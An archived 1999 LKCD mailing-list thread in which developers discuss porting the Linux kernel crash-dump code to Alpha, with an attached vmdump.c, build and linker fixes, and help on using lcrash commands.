vmdump.c(.text+0xb85c): undefined reference to `dump_page_buf' vmdump.c(.text+0xb934): undefined reference to `dump_page_buf' vmdump.c(.text+0xb968): undefined reference to `dump_page_buf' vmdump.c(.text+0xb97c): undefined reference to `dump_page_buf' arch/alpha/kernel/kernel.o(.text+0xb9bc):vmdump.c: more undefined references to `dump_page_buf' follow Attached is my current version of arch/alpha/kernel/vmdump.c. -- Brian Hall Linux Consultant --_=XFMail.1.4.4.Linux:19991224103036:14377=_ Content-Disposition: attachment; filename="vmdump.c" Content-Transfer-Encoding: quoted-printable Content-Description: vmdump.c Content-Type: application/octet-stream; name=vmdump.c; SizeOnDisk=11708 /* * Architecture specific (Alpha) functions for Linux crash dumps. * * Created by: Matt Robinson (yakker@sgi.com) * * Ported to Alpha by: Brian Hall (brihall@bigfoot.com) * * Copyright 1999 Silicon Graphics, Inc. All rights reserved. *=20 */ /* * The hooks for dumping the kernel virtual memory to disk are in this * file. Any time a modification is made to the virtual memory mechanism, * these routines must be changed to use the new mechanisms. */ #include #include #ifndef CONFIG_VMDUMP #define CONFIG_VMDUMP #include #endif #include #include /* static variables */ static dump_header_t dump_header; static char dpcpage[PAGE_SIZE]; /* external variables */ extern struct new_utsname system_utsname; extern void *dump_page_buf; /* * Name: __dump_write() * Func: Write out memory to the appropriate dump device, specific to * each architecture. */ static int __dump_write(struct file *dump_file, char *memory_page, int memory_len) { return (dump_file->f_op->write(dump_file, memory_page, memory_len, &(dump_file->f_pos))); } /* * Name: __dump_page_valid() * Func: Make sure the page address passed in is valid in the physical * address space. Right now, we validate all pages. */ static int __dump_page_valid(int mem_offset) { return (1); } /* * Name: __dump_compress() * Func: Compress a PAGE_SIZE page down to something more reasonable, * if possible. This is the same routine we use in IRIX. * * XXX - this needs to be changed for greater than 32-bit systems. */ static uint32_t __dump_compress(char *old_addr, char *new, int size) { int ri, wi, count =3D 0; u_char value =3D 0, cur_byte; /* * If the block should happen to "compress" to larger than the * buffer size, allocate a larger one and change cur_buf_size. */ wi =3D ri =3D 0; while (ri < size) { if (!ri) { cur_byte =3D value =3D old_addr[ri]; count =3D 0; } else { if (count =3D=3D 255) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; value =3D cur_byte =3D old_addr[ri]; count =3D 0; } else {=20 if ((cur_byte =3D old_addr[ri]) =3D=3D value) { count++; } else { if (count > 1) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; } else if (count =3D=3D 1) { if (value =3D=3D 0) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D 1; new[wi++] =3D 0; } else { if (wi + 2 > size) { return size; } new[wi++] =3D value; new[wi++] =3D value; } } else { /* count =3D=3D 0 */ if (value =3D=3D 0) { if (wi + 2 > size) { return size; } new[wi++] =3D value; new[wi++] =3D value; } else { if (wi + 1 > size) { return size; } new[wi++] =3D value; } } /* if count > 1 */ value =3D cur_byte; count =3D 0; } /* if byte =3D=3D value */ } /* if count =3D=3D 255 */ } /* if ri =3D=3D 0 */ ri++; } if (count > 1) { if (wi + 3 > size) { return size; } new[wi++] =3D 0; new[wi++] =3D count; new[wi++] =3D value; } else if (count =3D=3D 1) { if (value =3D=3D 0) { if (wi + 3 > size) return size; new[wi++] =3D 0; new[wi++] =3D 1; new[wi++] =3D 0; } else { if (wi + 2 > size) return size; new[wi++] =3D value; new[wi++] =3D value; } } else { /* count =3D=3D 0 */ if (value =3D=3D 0) { if (wi + 2 > size) return size; new[wi++] =3D value; new[wi++] =3D value; } else { if (wi + 1 > size) return size; new[wi++] =3D value; } } /* if count > 1 */ value =3D cur_byte; count =3D 0; return wi; } /* * Name: __dump_write_header() * Func: Write out the dump header to the dump device. This is done * in almost every case, unless the dump_level is 0. */ static int __dump_write_header(struct file *dump_file) { /* write dump header initial values */ dump_header.dh_magic_number =3D DUMP_MAGIC_NUMBER; dump_header.dh_version =3D DUMP_VERSION_NUMBER; dump_header.dh_header_size =3D sizeof(dump_header_t); dump_header.dh_page_size =3D PAGE_SIZE; do_gettimeofday(&dump_header.dh_time); memcpy((void *)&(dump_header.dh_utsname), (const void *)&system_utsname, sizeof(struct new_utsname)); /* make sure the dump header isn't TOO big */ if (sizeof(dump_header_t) > PAGE_SIZE) { printk(KERN_WARNING "__dump_write_header(): header larger " "than PAGE_SIZE!\n"); return (-1); } /* clear the dump page buffer */ memset(dump_page_buf, 0, DUMP_PAGE_SZ); /* copy the dump header directly into the dump page buffer */ memcpy((void *)dump_page_buf, (const void *)&dump_header, sizeof(dump_header_t)); /* write the header out to disk */ dump_file->f_pos =3D PAGE_SIZE; if (__dump_write(dump_file, (char *)dump_page_buf, DUMP_PAGE_SZ) < 0) { return (-1); } return (0); } /* * Name: __dump_close() * Func: Close a dump device (properly if possible). */ static void __dump_close(struct file *dump_file) { return; } /* * Name: __dump_execute() * Func: Architecture specific dumping routine. This allows various * system types to come up with their own crash dump implementation * without stepping changing the basic process. */ void __dump_execute(struct file *dump_file, char *panic_str, struct pt_regs *regs, int dump_level, int dump_compress_pages) { register unsigned long sptr __asm__("$30"); dump_page_t dp; uint32_t mem_loc, buf_loc; uint32_t cloop, size, psize; dump_here:=20 psize =3D sizeof(dump_page_t); buf_loc =3D cloop =3D 0; =09 /* if they don't want to dump out memory, bail out */ if ((dump_level =3D=3D DUMP_NONE) || (!dump_file)) { return; } /* set up a couple of the one-time dump header values */ dump_header.dh_dump_level =3D dump_level; dump_header.dh_current_task =3D current; if (regs) { memcpy((void *)&(dump_header.dh_regs), (const void *)regs, sizeof(struct pt_regs)); } if (panic_str) { memcpy((void *)&(dump_header.dh_panic_string), (const void *)panic_str, DUMP_PANIC_LEN); } /* For Alpha, save the Program Counter and Stack Pointer */ dump_header.dh_esp =3D sptr; dump_header.dh_eip =3D &&dump_here; /* get Program Counter */ =09 /* dump out the header */ printk("Writing dump header ..."); if (__dump_write_header(dump_file) < 0) { printk(" __dump_write_header() failed!\n"); return; } /* if we only want the header, return */ if (dump_level =3D=3D DUMP_HEADER) { printk("\nDump complete.\n"); return; } printk("\nWriting dump pages ..."); /* get the first memory page from the start of memory, aligned */ mem_loc =3D dump_header.dh_memory_start; /* clear the dump page buffer */ memset(dump_page_buf, 0, DUMP_PAGE_SZ); /* * Start walking through each page of memory, dumping it out * as you go. The real key here is that we have to cram all * of our write operations into a page/sector aligned size, * because we are using raw I/O code to perform the writes to * disk. This means we need to fit as much as possible into * a 64K write(). So we write dump page header, then the page * itself (which may be compressed), etc., etc., etc., until * we can't fit another compressed page into the write buffer. * We then write the entire page out to the dump device. */ while (mem_loc < dump_header.dh_memory_end) { /* make sure the address is valid in the physical space */ if (!__dump_page_valid(mem_loc)) { continue; } /* * Create the dump header -- XXX for greater than * 32-bit memory spaces, this must be corrected so * the high address is used properly. */ dp.dp_address =3D mem_loc; dp.dp_flags =3D DUMP_RAW; dp.dp_size =3D PAGE_SIZE; /* see if we want to compress the pages or not */ if (dump_compress_pages) { dp.dp_flags =3D DUMP_COMPRESSED; memset(dpcpage, 0, PAGE_SIZE); /* get the new compressed page size */ size =3D __dump_compress((char *)mem_loc, (char *)dpcpage, PAGE_SIZE); /* if compressed page is same size, skip it */ if (size =3D=3D PAGE_SIZE) { dp.dp_flags =3D DUMP_RAW; dp.dp_size =3D PAGE_SIZE; } else { dp.dp_size =3D size; } } /* copy the page header */ memcpy((void *)(dump_page_buf + buf_loc), (const void *)&dp, psize); buf_loc +=3D psize; /* copy the page of memory */ if (dp.dp_flags & DUMP_COMPRESSED) { /* copy the compressed page */ memcpy((void *)(dump_page_buf + buf_loc), (const void *)dpcpage, dp.dp_size); } else { /* copy directly from memory */ memcpy((void *)(dump_page_buf + buf_loc), (const void *)mem_loc, dp.dp_size); } buf_loc +=3D dp.dp_size; /* see if we need to write out the buffer */ if (buf_loc >=3D DUMP_PAGE_SZ) { if (__dump_write(dump_file, dump_page_buf, DUMP_PAGE_SZ) < 0) { printk(" dump write error!\n"); return; } if (buf_loc > DUMP_PAGE_SZ) { /* clear the dump page buffer */ memset(dump_page_buf, 0, DUMP_PAGE_SZ); /* copy the dump page buffer remnants */ memcpy((void *)dump_page_buf, (const void *)(dump_page_buf + DUMP_PAGE_SZ), buf_loc - DUMP_PAGE_SZ); /* set the new buffer location */ buf_loc -=3D DUMP_PAGE_SZ; } else { buf_loc =3D 0; } /* see if we want to print out a '.' */ cloop++; if (!(cloop & 0xff)) { printk("."); } } /* update the page count */ dump_header.dh_num_pages++; /* increment to the next page */ mem_loc +=3D PAGE_SIZE; } /* set up the dump page header with DUMP_END */ dp.dp_address =3D 0x0; dp.dp_flags =3D DUMP_END; dp.dp_size =3D 0x0; /* copy the current buffer */ memcpy((void *)(dump_page_buf + buf_loc), (const void *)&dp, psize); /* increment the buffer size */ buf_loc +=3D psize; /* write out now that we have the DUMP_END header in there */ if (__dump_write(dump_file, dump_page_buf, DUMP_PAGE_SZ) < 0) { printk(" dump write error!\n"); return; } /* we have something left in the buffer to write out ... */ if (buf_loc > DUMP_PAGE_SZ) { /* clear the dump page buffer */ memset(dump_page_buf, 0, DUMP_PAGE_SZ); /* copy the dump page buffer remnants */ memcpy((void *)dump_page_buf, (const void *)(dump_page_buf + DUMP_PAGE_SZ), buf_loc - DUMP_PAGE_SZ); /* set the new buffer location */ buf_loc -=3D DUMP_PAGE_SZ; /* write out that _last_ bit of buffer! */ if (__dump_write(dump_file, dump_page_buf, DUMP_PAGE_SZ) < 0) { printk(" dump write error!\n"); return; } } /* terminate the dots ... */ printk("\n"); /* dump out the dump header again - reset the file position! */ if (__dump_write_header(dump_file) < 0) { printk("Final dump header update failed!\n"); return; } printk("Dump complete.\n"); /* close the dump device */ __dump_close(dump_file); return; } /* * Name: __dump_init() * Func: Initialize the dumping routine process. For now, this just * copies the locations of the beginning and end of memory. * TODO: Add code to handle memory gaps appropriately. */ void __dump_init(uint64_t local_memory_start, uint64_t local_memory_end) { /* initialize the dump header to zero */ memset(&dump_header, 0, sizeof(dump_header)); /* copy the locations of the start and end of memory */ dump_header.dh_memory_start =3D local_memory_start; dump_header.dh_memory_end =3D local_memory_end; return; } /* * Name: __dump_open() * Func: Open the dump device (architecture specific). This is in * case it's necessary in the future. */ void __dump_open(struct file *dump_file, uint64_t memory_size) { /* set the memory size now */ dump_header.dh_memory_size =3D memory_size; /* return */ return; } --_=XFMail.1.4.4.Linux:19991224103036:14377=_-- End of MIME message From owner-lkcd@oss.sgi.com Wed Dec 22 15:38:58 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 15:38:48 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:10816 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 22 Dec 1999 15:38:20 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id PAA04007 for ; Wed, 22 Dec 1999 15:39:51 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id PAA59851; Wed, 22 Dec 1999 15:36:37 -0800 (PST) Date: Wed, 22 Dec 1999 15:36:37 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Brian Hall cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: new problem: can't see vmdump.h? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Fri, 24 Dec 1999, Brian Hall wrote: |>That fixed the vmdump.h problem. Now it actually compiles, with warnings |>(implied casts). I notice that dh_esp and dh_eip are 32 bits wide; they will |>need to be 64 bit for Alpha; and the other uint32_t(s) in vmdump.c |>(__dump_execute) will also need to be uint64_t(s), and the changes |>propagated, correct? |> |>Now, should I go ahead and change dump_header_t to (choose one): |>1) make dh_esp,etc uint64_t(s) in the header; I'd make them whatever the dh_esp and dh_eip equivalents are in the pt_regs structure for SP and PC. |>2) add fields specifically for alpha; |>3) do #1 and change them to dh_sp and dh_pc while I'm at it? Do the name change while you're at it. I'll change things in our patch. |>While it will compile, it fails to link because alpha/vmdump.o can't find |>dump_page_buf. Here are the errors: |> |>arch/alpha/kernel/kernel.o: In function `__dump_write_header': |>vmdump.c(.text+0xb658): undefined reference to `dump_page_buf' |>arch/alpha/kernel/kernel.o: In function `__dump_execute': |>vmdump.c(.text+0xb85c): undefined reference to `dump_page_buf' |>vmdump.c(.text+0xb934): undefined reference to `dump_page_buf' |>vmdump.c(.text+0xb968): undefined reference to `dump_page_buf' |>vmdump.c(.text+0xb97c): undefined reference to `dump_page_buf' |>arch/alpha/kernel/kernel.o(.text+0xb9bc):vmdump.c: more undefined references to |>`dump_page_buf' follow |> |>Attached is my current version of arch/alpha/kernel/vmdump.c. Hmmm ... That'd be because for whatever reason, it's not showing up in your kernel/vmdump.c file. It's defined there for the main build. Are you sure you're compiling with CONFIG_VMDUMP defined everywhere? Change the header for vmdump.c in the kernel directory, to the same thing for the file. That should eliminate your problem. The real question is, why aren't you getting your CONFIG_VMDUMP stuff defined when you build? --Matt |>-- |>Brian Hall |>Linux Consultant |> From owner-lkcd@oss.sgi.com Wed Dec 22 15:44:58 1999 Received: by oss.sgi.com id ; Wed, 22 Dec 1999 15:44:48 -0800 Received: from deliverator.sgi.com ([204.94.214.10]:48651 "EHLO deliverator.sgi.com") by oss.sgi.com with ESMTP id ; Wed, 22 Dec 1999 15:44:37 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by deliverator.sgi.com (980309.SGI.8.8.8-aspam-6.2/980310.SGI-aspam) via ESMTP id PAA20820 for ; Wed, 22 Dec 1999 15:39:56 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id PAA64010; Wed, 22 Dec 1999 15:42:55 -0800 (PST) Date: Wed, 22 Dec 1999 15:42:55 -0800 (PST) From: Matt Robinson To: Matt Robinson cc: Brian Hall , lkcd@oss.sgi.com Subject: Re: new problem: can't see vmdump.h? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Wed, 22 Dec 1999, Matt Robinson wrote: |>Change the header for vmdump.c in the kernel directory, to the same |>thing for the file. That should eliminate your |>problem. To clarify, it would be: #ifndef CONFIG_VMDUMP #define CONFIG_VMDUMP #include #endif And change kernel/Makefile so that vmdump.o isn't on the O_OBJS build line (at the top of the file), and instead you have: ifeq ($(CONFIG_VMDUMP,y) O_OBJS += vmdump.o endif Thanks, Brian, let me know how it goes. --Matt P.S. When you get to cmd/lcrash, remember to build with the following arguments: make TOPDIR= ARCH= So, in my case, it'd be: make TOPDIR=/usr/src/linux ARCH=i386 From owner-lkcd@oss.sgi.com Thu Dec 23 00:45:59 1999 Received: by oss.sgi.com id ; Thu, 23 Dec 1999 00:45:50 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:6323 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 23 Dec 1999 00:45:32 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 23 00:44:35 1999 To: "Tom Morano" Date: Thu, 23 Dec 1999 00:44:35 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: "Matt Robinson" , lkcd@oss.sgi.com X-Sent-Mail: on Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in using lcrash commands X-Sender-Ip: 203.141.89.173 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 3687 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing hi Matt and Tom, I tried the commands in Lcrash again but will the same problem, it gives to me that the usage of the command is not proper. like in the ptype command it asks for the --- type addr i dont know where to get these parameters to supply to the commands and what does those parameters mean. Also at some places it asks for some addresses, like stack address etc. where to get those addresses from. I am not able to find namelists, what is meant by namelists and how are they specified. Can u tell me where can i get the comprehensive documentation for the commands that are being used here so that i can get to know the proper usage for these commands. In my previous mail i stated wrong by mistake that i get segmentation fault with " whatis -s " , i get that problem with "whatis -a". i am not able to find these answers in the FAQ's . i have also gone through the source code for the commands and am not able to solve these problems. --Ashish -- On Tue, 21 Dec 1999 09:00:15 Tom Morano wrote: >Ashish Arora wrote: >> >> Dear Matt, >> i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem. > >It's hard to tell what's going on without an example of what you are trying. >Could you >please provide such an example? > >> Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash. > >Hi Ashish, > >I'm not sure what's going on here. The -s flag is not valid for the 'whatis' >command. When >I tried it, here's what I got... > >>> whatis -s >Illegal comamnd line option: 's' >USAGE: whatis [-a] [-f] [-l] [-n] [-w outfile] expression > >BTW, the whatis command doesn't do anything unless you first load in type >information from >a namelist file (one is created in the cmd/lcrash/lib/libklib directory). You >have to >issue a command such as this: > >>> addtypes namelist > >Then you can do something like this... > >>> whatis socket >struct socket { > socket_state state; > long unsigned int flags; > struct proto_ops *ops; > struct inode *inode; > struct fasync_struct *fasync_list; > struct file *file; > struct sock *sk; > struct wait_queue *wait; > short int type; > unsigned char passcred; > unsigned char tli; >}; > >Hope this helps, > >Tom > >> --Ashish >> >> -- >> >> On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote: >> >Ashish, have you read the FAQ? >> > >> > http://oss.sgi.com/projects/lkcd/faq.html#2.3 >> > >> >This should have answered your question. >> > >> >--Matt >> > >> >On Wed, 15 Dec 1999, Keith Owens wrote: >> >|>On Tue, 14 Dec 1999 22:27:17 -0800, >> >|>"Ashish Arora" wrote: >> >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. >> >|> >> >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* >> >|>the lkcd patch. >> >|> >> > >> > >> >> LYCOShop is now open. On your mark, get set, SHOP!!! >> http://shop.lycos.com/ > LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/